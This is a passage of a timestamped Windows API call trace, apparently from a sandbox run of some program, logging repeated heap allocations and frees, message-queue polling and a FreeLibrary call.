Size=0x4) returned 0x9c2748 [0181.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0181.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0181.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0181.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0181.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0181.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0181.931] FreeLibrary (hLibModule=0x75990000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0181.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0181.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0181.932] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0181.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0181.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0181.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0181.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0181.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0181.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0181.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0181.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0181.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0181.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0181.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0181.933] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0181.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0181.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0181.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0181.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0181.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0181.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0181.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0181.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0181.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0181.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0181.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0181.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0181.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.937] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0181.937] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0181.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0181.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0181.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0181.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0181.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0181.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0181.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0181.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0181.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0181.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0181.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0181.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0181.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0181.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0181.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0181.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0181.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0181.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0181.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0181.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0181.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0181.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0181.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0181.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0181.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0181.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0181.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a20 [0181.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0181.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0181.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0181.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0181.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0181.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0181.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0181.940] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0181.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0181.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0181.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 